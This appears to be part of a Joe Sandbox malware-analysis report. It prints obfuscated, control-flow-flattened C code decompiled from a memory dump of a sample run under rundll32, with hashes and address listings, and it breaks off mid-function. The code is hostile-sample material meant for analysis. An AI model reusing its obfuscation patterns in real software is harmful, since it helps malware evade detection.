                                                                                                                          • Instruction ID: 36d7ea999c54e8ffd9f5387457573c006380d87d29ca9a4531cbe5ff780dd779
                                                                                                                          • Opcode Fuzzy Hash: 4b31a38b0853a938c98b78d50f46f2734b4728c91684112341591dc202904d3b
                                                                                                                          • Instruction Fuzzy Hash: E8A17771108380CBCB28DF65F69952BBBE1FBC5308F144A2EF19696261D7399A09DF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E007A4116() {
                                                                                                                          				char _v524;
                                                                                                                          				intOrPtr _v548;
                                                                                                                          				char _v564;
                                                                                                                          				intOrPtr _v568;
                                                                                                                          				char _v572;
                                                                                                                          				signed int _v576;
                                                                                                                          				signed int _v580;
                                                                                                                          				signed int _v584;
                                                                                                                          				signed int _v588;
                                                                                                                          				signed int _v592;
                                                                                                                          				signed int _v596;
                                                                                                                          				signed int _v600;
                                                                                                                          				signed int _v604;
                                                                                                                          				signed int _v608;
                                                                                                                          				signed int _v612;
                                                                                                                          				signed int _v616;
                                                                                                                          				signed int _v620;
                                                                                                                          				signed int _v624;
                                                                                                                          				signed int _v628;
                                                                                                                          				signed int _v632;
                                                                                                                          				signed int _v636;
                                                                                                                          				signed int _v640;
                                                                                                                          				signed int _v644;
                                                                                                                          				signed int _v648;
                                                                                                                          				signed int _v652;
                                                                                                                          				signed int _v656;
                                                                                                                          				signed int _t220;
                                                                                                                          				signed int _t222;
                                                                                                                          				void* _t224;
                                                                                                                          				void* _t226;
                                                                                                                          				void* _t227;
                                                                                                                          				signed int _t229;
                                                                                                                          				signed int _t230;
                                                                                                                          				signed int _t231;
                                                                                                                          				signed int _t232;
                                                                                                                          				signed int _t233;
                                                                                                                          				signed int _t250;
                                                                                                                          				void* _t253;
                                                                                                                          				void* _t258;
                                                                                                                          				void* _t260;
                                                                                                                          
                                                                                                                          				_v604 = 0x9b146b;
                                                                                                                          				_v604 = _v604 | 0x658b3ccc;
                                                                                                                          				_v604 = _v604 + 0xfffff1f3;
                                                                                                                          				_v604 = _v604 ^ 0x659b2e62;
                                                                                                                          				_v596 = 0xb07d39;
                                                                                                                          				_v596 = _v596 | 0x89b98cff;
                                                                                                                          				_v596 = _v596 ^ 0x89b9fdfe;
                                                                                                                          				_v584 = 0x342693;
                                                                                                                          				_v584 = _v584 ^ 0x5537c6ac;
                                                                                                                          				_v584 = _v584 ^ 0x5503e03c;
                                                                                                                          				_v628 = 0x844a73;
                                                                                                                          				_v628 = _v628 | 0x8aea995b;
                                                                                                                          				_v628 = _v628 >> 3;
                                                                                                                          				_v628 = _v628 ^ 0x3316179a;
                                                                                                                          				_v628 = _v628 ^ 0x224eeca0;
                                                                                                                          				_v644 = 0xac1c02;
                                                                                                                          				_v644 = _v644 * 0x6d;
                                                                                                                          				_t227 = 0;
                                                                                                                          				_v644 = _v644 << 0xf;
                                                                                                                          				_t253 = 0x9728f62;
                                                                                                                          				_t229 = 0x52;
                                                                                                                          				_v644 = _v644 * 0x23;
                                                                                                                          				_v644 = _v644 ^ 0xb0e78180;
                                                                                                                          				_v636 = 0x949b2b;
                                                                                                                          				_v636 = _v636 / _t229;
                                                                                                                          				_v636 = _v636 << 4;
                                                                                                                          				_t230 = 0x48;
                                                                                                                          				_v636 = _v636 / _t230;
                                                                                                                          				_v636 = _v636 ^ 0x000805f9;
                                                                                                                          				_v652 = 0x50f951;
                                                                                                                          				_v652 = _v652 << 0xe;
                                                                                                                          				_v652 = _v652 + 0xffff7357;
                                                                                                                          				_v652 = _v652 >> 5;
                                                                                                                          				_v652 = _v652 ^ 0x01f330c3;
                                                                                                                          				_v624 = 0xa7ee55;
                                                                                                                          				_v624 = _v624 + 0x328f;
                                                                                                                          				_t231 = 0x36;
                                                                                                                          				_v624 = _v624 / _t231;
                                                                                                                          				_v624 = _v624 + 0x3260;
                                                                                                                          				_v624 = _v624 ^ 0x000caec1;
                                                                                                                          				_v632 = 0x45b476;
                                                                                                                          				_v632 = _v632 << 0xf;
                                                                                                                          				_v632 = _v632 + 0x3fe9;
                                                                                                                          				_v632 = _v632 + 0xffffc242;
                                                                                                                          				_v632 = _v632 ^ 0xda30ae70;
                                                                                                                          				_v576 = 0xb3f46f;
                                                                                                                          				_v576 = _v576 >> 0xe;
                                                                                                                          				_v576 = _v576 ^ 0x000becca;
                                                                                                                          				_v640 = 0x899e10;
                                                                                                                          				_v640 = _v640 << 3;
                                                                                                                          				_v640 = _v640 | 0x15c6522a;
                                                                                                                          				_v640 = _v640 >> 0xc;
                                                                                                                          				_v640 = _v640 ^ 0x00018fe0;
                                                                                                                          				_v648 = 0x6b2405;
                                                                                                                          				_v648 = _v648 | 0xec8a856c;
                                                                                                                          				_v648 = _v648 + 0xffffe7b2;
                                                                                                                          				_v648 = _v648 >> 0xd;
                                                                                                                          				_v648 = _v648 ^ 0x000a0717;
                                                                                                                          				_v608 = 0xd62f5d;
                                                                                                                          				_v608 = _v608 + 0xffffa804;
                                                                                                                          				_v608 = _v608 >> 1;
                                                                                                                          				_v608 = _v608 ^ 0x00686b18;
                                                                                                                          				_v580 = 0x2fce72;
                                                                                                                          				_t232 = 6;
                                                                                                                          				_v580 = _v580 / _t232;
                                                                                                                          				_v580 = _v580 ^ 0x000627ef;
                                                                                                                          				_v612 = 0xa7d19a;
                                                                                                                          				_v612 = _v612 ^ 0x125f9685;
                                                                                                                          				_v612 = _v612 ^ 0x35fdcbd7;
                                                                                                                          				_v612 = _v612 ^ 0x270c67d8;
                                                                                                                          				_v656 = 0x784491;
                                                                                                                          				_v656 = _v656 >> 9;
                                                                                                                          				_v656 = _v656 | 0xfbff7fff;
                                                                                                                          				_v656 = _v656 ^ 0xfbf9abc9;
                                                                                                                          				_v616 = 0xc21bdd;
                                                                                                                          				_t233 = 0x58;
                                                                                                                          				_v616 = _v616 / _t233;
                                                                                                                          				_v616 = _v616 | 0xde7eb344;
                                                                                                                          				_v616 = _v616 ^ 0xde714edb;
                                                                                                                          				_v620 = 0x22ba29;
                                                                                                                          				_v620 = _v620 + 0xc334;
                                                                                                                          				_v620 = _v620 ^ 0x41b5236d;
                                                                                                                          				_v620 = _v620 ^ 0x4193ad78;
                                                                                                                          				_v588 = 0x61092c;
                                                                                                                          				_v588 = _v588 | 0xfbe761ce;
                                                                                                                          				_v588 = _v588 ^ 0xfbe7142a;
                                                                                                                          				_v600 = 0xd9609d;
                                                                                                                          				_v600 = _v600 | 0x95d54fcb;
                                                                                                                          				_v600 = _v600 ^ 0x95d705b7;
                                                                                                                          				_v592 = 0xc80f6b;
                                                                                                                          				_t234 = 0x42;
                                                                                                                          				_t252 = _v600;
                                                                                                                          				_v592 = _v592 / _t234;
                                                                                                                          				_v592 = _v592 ^ 0x0000156e;
                                                                                                                          				do {
                                                                                                                          					while(_t253 != 0x25f6a69) {
                                                                                                                          						if(_t253 == 0x9728f62) {
                                                                                                                          							_t253 = 0xea70970;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t253 == 0x9c0fe90) {
                                                                                                                          								_t250 = _v632;
                                                                                                                          								_t220 = E00798F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
                                                                                                                          								_t252 = _t220;
                                                                                                                          								_t260 = _t260 + 0x28;
                                                                                                                          								__eflags = _t220 - 0xffffffff;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_t253 = 0xaccbeb9;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t253 == 0xaccbeb9) {
                                                                                                                          									_t222 = E00799350( &_v564, _t252, _v608, _v580, _t234, _v612);
                                                                                                                          									asm("sbb esi, esi");
                                                                                                                          									_t250 = _v616;
                                                                                                                          									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
                                                                                                                          									_t234 = _v656;
                                                                                                                          									E007A1E67(_v656, _t250, _v620, _v588, _t252);
                                                                                                                          									_t260 = _t260 + 0x20;
                                                                                                                          									goto L14;
                                                                                                                          								} else {
                                                                                                                          									if(_t253 == 0xdba0984) {
                                                                                                                          										_t224 = E007AABD1();
                                                                                                                          										_t258 = _v572 - _v548;
                                                                                                                          										asm("sbb ecx, [esp+0x84]");
                                                                                                                          										__eflags = _v568 - _t250;
                                                                                                                          										if(__eflags >= 0) {
                                                                                                                          											if(__eflags > 0) {
                                                                                                                          												L19:
                                                                                                                          												_t227 = 1;
                                                                                                                          												__eflags = 1;
                                                                                                                          											} else {
                                                                                                                          												__eflags = _t258 - _t224;
                                                                                                                          												if(_t258 >= _t224) {
                                                                                                                          													goto L19;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_t268 = _t253 - 0xea70970;
                                                                                                                          										if(_t253 != 0xea70970) {
                                                                                                                          											goto L14;
                                                                                                                          										} else {
                                                                                                                          											_t250 = _v644;
                                                                                                                          											_t234 = _v628;
                                                                                                                          											_t226 = E007ADA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
                                                                                                                          											_t260 = _t260 + 0x10;
                                                                                                                          											if(_t226 != 0) {
                                                                                                                          												_t253 = 0x9c0fe90;
                                                                                                                          												continue;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L20:
                                                                                                                          						return _t227;
                                                                                                                          					}
                                                                                                                          					E007AC1EC(_v600, _v592,  &_v572);
                                                                                                                          					_pop(_t234);
                                                                                                                          					_t253 = 0xdba0984;
                                                                                                                          					L14:
                                                                                                                          					__eflags = _t253 - 0x15a60c5;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L20;
                                                                                                                          			}


                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,a$`2$?
                                                                                                                          • API String ID: 0-2087061617
                                                                                                                          • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                          • Instruction ID: cb505531c94a9786cdc8c572963e492bd73d14484da32bdc3041f2619c5de8a8
                                                                                                                          • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                          • Instruction Fuzzy Hash: 50A112729083819FC758CF65C88A40FFBF1BBC5718F008A1DF59A96260D3B689098F46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007959F2() {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				intOrPtr _v1044;
                                                                                                                          				intOrPtr _v1048;
                                                                                                                          				intOrPtr _v1052;
                                                                                                                          				intOrPtr _v1056;
                                                                                                                          				signed int _v1060;
                                                                                                                          				signed int _v1064;
                                                                                                                          				signed int _v1068;
                                                                                                                          				signed int _v1072;
                                                                                                                          				signed int _v1076;
                                                                                                                          				signed int _v1080;
                                                                                                                          				signed int _v1084;
                                                                                                                          				signed int _v1088;
                                                                                                                          				signed int _v1092;
                                                                                                                          				signed int _v1096;
                                                                                                                          				signed int _v1100;
                                                                                                                          				signed int _v1104;
                                                                                                                          				signed int _v1108;
                                                                                                                          				signed int _v1112;
                                                                                                                          				signed int _v1116;
                                                                                                                          				signed int _v1120;
                                                                                                                          				signed int _v1124;
                                                                                                                          				signed int _v1128;
                                                                                                                          				signed int _v1132;
                                                                                                                          				signed int _v1136;
                                                                                                                          				signed int _v1140;
                                                                                                                          				void* _t202;
                                                                                                                          				void* _t208;
                                                                                                                          				intOrPtr _t209;
                                                                                                                          				void* _t214;
                                                                                                                          				void* _t222;
                                                                                                                          				intOrPtr _t237;
                                                                                                                          				intOrPtr _t240;
                                                                                                                          				signed int _t241;
                                                                                                                          				signed int _t242;
                                                                                                                          				signed int _t243;
                                                                                                                          				signed int _t244;
                                                                                                                          				signed int* _t247;
                                                                                                                          
                                                                                                                          				_t247 =  &_v1140;
                                                                                                                          				_v1056 = 0x36f622;
                                                                                                                          				_v1052 = 0x8ed67e;
                                                                                                                          				_t214 = 0xf737bb2;
                                                                                                                          				_v1048 = 0x93fb3c;
                                                                                                                          				_t240 = 0;
                                                                                                                          				_v1044 = 0;
                                                                                                                          				_v1076 = 0x48eb17;
                                                                                                                          				_v1076 = _v1076 + 0x189d;
                                                                                                                          				_v1076 = _v1076 ^ 0x00442401;
                                                                                                                          				_v1100 = 0xa45863;
                                                                                                                          				_v1100 = _v1100 << 2;
                                                                                                                          				_t241 = 0x1d;
                                                                                                                          				_v1100 = _v1100 * 0x7c;
                                                                                                                          				_v1100 = _v1100 ^ 0x3e6538f4;
                                                                                                                          				_v1108 = 0x56f1ad;
                                                                                                                          				_v1108 = _v1108 | 0xbff0a597;
                                                                                                                          				_v1108 = _v1108 / _t241;
                                                                                                                          				_v1108 = _v1108 ^ 0x06946226;
                                                                                                                          				_v1132 = 0xc3fd0a;
                                                                                                                          				_v1132 = _v1132 << 8;
                                                                                                                          				_v1132 = _v1132 + 0xffff9bc2;
                                                                                                                          				_t242 = 0x18;
                                                                                                                          				_v1132 = _v1132 / _t242;
                                                                                                                          				_v1132 = _v1132 ^ 0x0821d39f;
                                                                                                                          				_v1068 = 0xc66dea;
                                                                                                                          				_v1068 = _v1068 + 0xffff0514;
                                                                                                                          				_v1068 = _v1068 ^ 0x00c0919e;
                                                                                                                          				_v1136 = 0x72811d;
                                                                                                                          				_v1136 = _v1136 ^ 0x5ea2c622;
                                                                                                                          				_t243 = 0x5d;
                                                                                                                          				_v1136 = _v1136 * 0x4f;
                                                                                                                          				_v1136 = _v1136 * 0x41;
                                                                                                                          				_v1136 = _v1136 ^ 0xd3c4c324;
                                                                                                                          				_v1096 = 0x2e25e6;
                                                                                                                          				_v1096 = _v1096 ^ 0xbdbebaf9;
                                                                                                                          				_v1096 = _v1096 ^ 0xbd932287;
                                                                                                                          				_v1060 = 0x3d42d8;
                                                                                                                          				_v1060 = _v1060 << 6;
                                                                                                                          				_v1060 = _v1060 ^ 0x0f5887f2;
                                                                                                                          				_v1116 = 0xec9c1f;
                                                                                                                          				_v1116 = _v1116 >> 1;
                                                                                                                          				_v1116 = _v1116 + 0xcef9;
                                                                                                                          				_v1116 = _v1116 ^ 0x0078140d;
                                                                                                                          				_v1084 = 0xf6a299;
                                                                                                                          				_v1084 = _v1084 >> 9;
                                                                                                                          				_v1084 = _v1084 ^ 0x00023821;
                                                                                                                          				_v1124 = 0xf6e97d;
                                                                                                                          				_v1124 = _v1124 + 0xffff8c4c;
                                                                                                                          				_v1124 = _v1124 / _t243;
                                                                                                                          				_v1124 = _v1124 | 0xda1c672f;
                                                                                                                          				_v1124 = _v1124 ^ 0xda1e012d;
                                                                                                                          				_v1120 = 0x9bdb66;
                                                                                                                          				_v1120 = _v1120 * 0x47;
                                                                                                                          				_v1120 = _v1120 + 0xdb13;
                                                                                                                          				_v1120 = _v1120 * 0x64;
                                                                                                                          				_v1120 = _v1120 ^ 0xe2e3c71f;
                                                                                                                          				_v1112 = 0x9fec0e;
                                                                                                                          				_v1112 = _v1112 << 0xc;
                                                                                                                          				_v1112 = _v1112 | 0xd7512eb2;
                                                                                                                          				_v1112 = _v1112 ^ 0xffdc645c;
                                                                                                                          				_v1104 = 0xc74eee;
                                                                                                                          				_v1104 = _v1104 + 0x930c;
                                                                                                                          				_v1104 = _v1104 ^ 0x28280d38;
                                                                                                                          				_v1104 = _v1104 ^ 0x28ef0d26;
                                                                                                                          				_v1064 = 0xc36095;
                                                                                                                          				_v1064 = _v1064 | 0x2d8f7273;
                                                                                                                          				_v1064 = _v1064 ^ 0x2dcb1501;
                                                                                                                          				_v1140 = 0xa3c477;
                                                                                                                          				_v1140 = _v1140 ^ 0xb16da3ec;
                                                                                                                          				_v1140 = _v1140 ^ 0x8917fdcb;
                                                                                                                          				_v1140 = _v1140 >> 0xe;
                                                                                                                          				_v1140 = _v1140 ^ 0x000e0fa0;
                                                                                                                          				_v1128 = 0x58136;
                                                                                                                          				_v1128 = _v1128 << 6;
                                                                                                                          				_v1128 = _v1128 << 0x10;
                                                                                                                          				_v1128 = _v1128 + 0xffffe729;
                                                                                                                          				_v1128 = _v1128 ^ 0x4d79f308;
                                                                                                                          				_v1072 = 0x735c84;
                                                                                                                          				_t244 = 0x7f;
                                                                                                                          				_v1072 = _v1072 / _t244;
                                                                                                                          				_v1072 = _v1072 ^ 0x0002b970;
                                                                                                                          				_v1080 = 0x91f75b;
                                                                                                                          				_v1080 = _v1080 + 0xffffc39e;
                                                                                                                          				_v1080 = _v1080 ^ 0x009f463e;
                                                                                                                          				_v1088 = 0xdf4dcf;
                                                                                                                          				_v1088 = _v1088 | 0x05792173;
                                                                                                                          				_v1088 = _v1088 ^ 0x05f69aec;
                                                                                                                          				_v1092 = 0xf44447;
                                                                                                                          				_v1092 = _v1092 * 0x78;
                                                                                                                          				_v1092 = _v1092 ^ 0x728504a1;
                                                                                                                          				do {
                                                                                                                          					while(_t214 != 0x89b0ee) {
                                                                                                                          						if(_t214 == 0x291094f) {
                                                                                                                          							E00793C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
                                                                                                                          						} else {
                                                                                                                          							if(_t214 == 0x6a25a64) {
                                                                                                                          								E007ADA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
                                                                                                                          								_t247 =  &(_t247[4]);
                                                                                                                          								_t214 = 0xe0c4196;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t214 == 0xe0c4196) {
                                                                                                                          									_push(_v1096);
                                                                                                                          									_push(_v1136);
                                                                                                                          									_t208 = E007ADCF7(_v1068, 0x791000, __eflags);
                                                                                                                          									_pop(_t222);
                                                                                                                          									_t209 =  *0x7b3e10; // 0x0
                                                                                                                          									_t237 =  *0x7b3e10; // 0x0
                                                                                                                          									E007947CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
                                                                                                                          									E0079A8B0(_v1112, _t208, _v1104);
                                                                                                                          									_t247 =  &(_t247[9]);
                                                                                                                          									_t214 = 0x89b0ee;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									if(_t214 != 0xf737bb2) {
                                                                                                                          										goto L10;
                                                                                                                          									} else {
                                                                                                                          										_t214 = 0x6a25a64;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L13:
                                                                                                                          						return _t240;
                                                                                                                          					}
                                                                                                                          					_push(_v1128);
                                                                                                                          					_push( &_v1040);
                                                                                                                          					_push(_v1140);
                                                                                                                          					_t202 = E007B13AD(_v1064,  &_v520, __eflags);
                                                                                                                          					_t247 =  &(_t247[3]);
                                                                                                                          					__eflags = _t202;
                                                                                                                          					_t240 =  !=  ? 1 : _t240;
                                                                                                                          					_t214 = 0x291094f;
                                                                                                                          					L10:
                                                                                                                          					__eflags = _t214 - 0xb653a05;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L13;
                                                                                                                          			}










































                                                                                                                          0x00795cc9
                                                                                                                          0x00795d69
                                                                                                                          0x00795d6e
                                                                                                                          0x00795d71
                                                                                                                          0x00000000
                                                                                                                          0x00795ccf
                                                                                                                          0x00795cd1
                                                                                                                          0x00795ce3
                                                                                                                          0x00795cec
                                                                                                                          0x00795cf4
                                                                                                                          0x00795cfa
                                                                                                                          0x00795d05
                                                                                                                          0x00795d1c
                                                                                                                          0x00795d2f
                                                                                                                          0x00795d3e
                                                                                                                          0x00795d43
                                                                                                                          0x00795d46
                                                                                                                          0x00000000
                                                                                                                          0x00795cd3
                                                                                                                          0x00795cd9
                                                                                                                          0x00000000
                                                                                                                          0x00795cdf
                                                                                                                          0x00795cdf
                                                                                                                          0x00000000
                                                                                                                          0x00795cdf
                                                                                                                          0x00795cd9
                                                                                                                          0x00795cd1
                                                                                                                          0x00795cc9
                                                                                                                          0x00795dd0
                                                                                                                          0x00795ddc
                                                                                                                          0x00795ddc
                                                                                                                          0x00795d78
                                                                                                                          0x00795d80
                                                                                                                          0x00795d81
                                                                                                                          0x00795d90
                                                                                                                          0x00795d97
                                                                                                                          0x00795d9b
                                                                                                                          0x00795d9d
                                                                                                                          0x00795da0
                                                                                                                          0x00795da5
                                                                                                                          0x00795da5
                                                                                                                          0x00795da5
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: &($&($%.
                                                                                                                          • API String ID: 0-466442461
                                                                                                                          • Opcode ID: 1f7b4a5c09241f46f8527dfb220b149c8cb5143e6f5059b3aba9412a158e8085
                                                                                                                          • Instruction ID: 93e444edcfbef7523dc69a498842d0d73b188c5d415efac365bb5bac1a9359dc
                                                                                                                          • Opcode Fuzzy Hash: 1f7b4a5c09241f46f8527dfb220b149c8cb5143e6f5059b3aba9412a158e8085
                                                                                                                          • Instruction Fuzzy Hash: 50A120B11083819FCB58CF26D58941BFBF1FBC4758F108A1DF5A696220D7B98A09CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007B13AD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                          				void* _t197;
                                                                                                                          				signed int _t222;
                                                                                                                          				signed int _t226;
                                                                                                                          				void* _t236;
                                                                                                                          				void* _t245;
                                                                                                                          				void* _t246;
                                                                                                                          
                                                                                                                          				_t245 = _t246 - 0x6c;
                                                                                                                          				_push( *((intOrPtr*)(_t245 + 0x7c)));
                                                                                                                          				_push( *((intOrPtr*)(_t245 + 0x78)));
                                                                                                                          				_push( *((intOrPtr*)(_t245 + 0x74)));
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t197);
                                                                                                                          				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
                                                                                                                          				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
                                                                                                                          				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
                                                                                                                          				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
                                                                                                                          				 *(_t245 + 0x38) = 0xf8747;
                                                                                                                          				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
                                                                                                                          				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
                                                                                                                          				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
                                                                                                                          				 *(_t245 + 0x4c) = 0x1e90b9;
                                                                                                                          				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
                                                                                                                          				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
                                                                                                                          				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
                                                                                                                          				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
                                                                                                                          				 *(_t245 + 0x54) = 0x94d35;
                                                                                                                          				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
                                                                                                                          				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
                                                                                                                          				 *(_t245 + 0x40) = 0x2ce8ae;
                                                                                                                          				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
                                                                                                                          				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
                                                                                                                          				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
                                                                                                                          				 *(_t245 + 0x58) = 0x43e6f3;
                                                                                                                          				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
                                                                                                                          				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
                                                                                                                          				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
                                                                                                                          				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
                                                                                                                          				 *(_t245 + 0x24) = 0x72d00d;
                                                                                                                          				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
                                                                                                                          				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
                                                                                                                          				 *(_t245 + 0x34) = 0x43d743;
                                                                                                                          				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
                                                                                                                          				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
                                                                                                                          				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
                                                                                                                          				 *(_t245 + 0x2c) = 0xa6821;
                                                                                                                          				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
                                                                                                                          				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
                                                                                                                          				 *(_t245 + 0x60) = 0x210575;
                                                                                                                          				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
                                                                                                                          				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
                                                                                                                          				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
                                                                                                                          				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
                                                                                                                          				 *(_t245 + 0x44) = 0xde4c18;
                                                                                                                          				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
                                                                                                                          				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
                                                                                                                          				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
                                                                                                                          				 *(_t245 + 0x50) = 0xde2575;
                                                                                                                          				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
                                                                                                                          				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
                                                                                                                          				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
                                                                                                                          				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
                                                                                                                          				 *(_t245 + 0x18) = 0x52bd7f;
                                                                                                                          				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
                                                                                                                          				 *(_t245 + 0x3c) = 0xe72c64;
                                                                                                                          				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
                                                                                                                          				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
                                                                                                                          				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
                                                                                                                          				 *(_t245 + 0x48) = 0x12926a;
                                                                                                                          				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
                                                                                                                          				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
                                                                                                                          				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
                                                                                                                          				 *(_t245 + 0x5c) = 0xf2f3b3;
                                                                                                                          				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
                                                                                                                          				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
                                                                                                                          				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
                                                                                                                          				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
                                                                                                                          				 *(_t245 + 0x64) = 0x250dfe;
                                                                                                                          				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
                                                                                                                          				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
                                                                                                                          				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
                                                                                                                          				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
                                                                                                                          				 *(_t245 + 0x68) = 0x1b0053;
                                                                                                                          				_t226 = 0x44;
                                                                                                                          				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
                                                                                                                          				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
                                                                                                                          				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
                                                                                                                          				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
                                                                                                                          				 *(_t245 + 0x30) = 0x848c63;
                                                                                                                          				_t142 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                          				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
                                                                                                                          				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
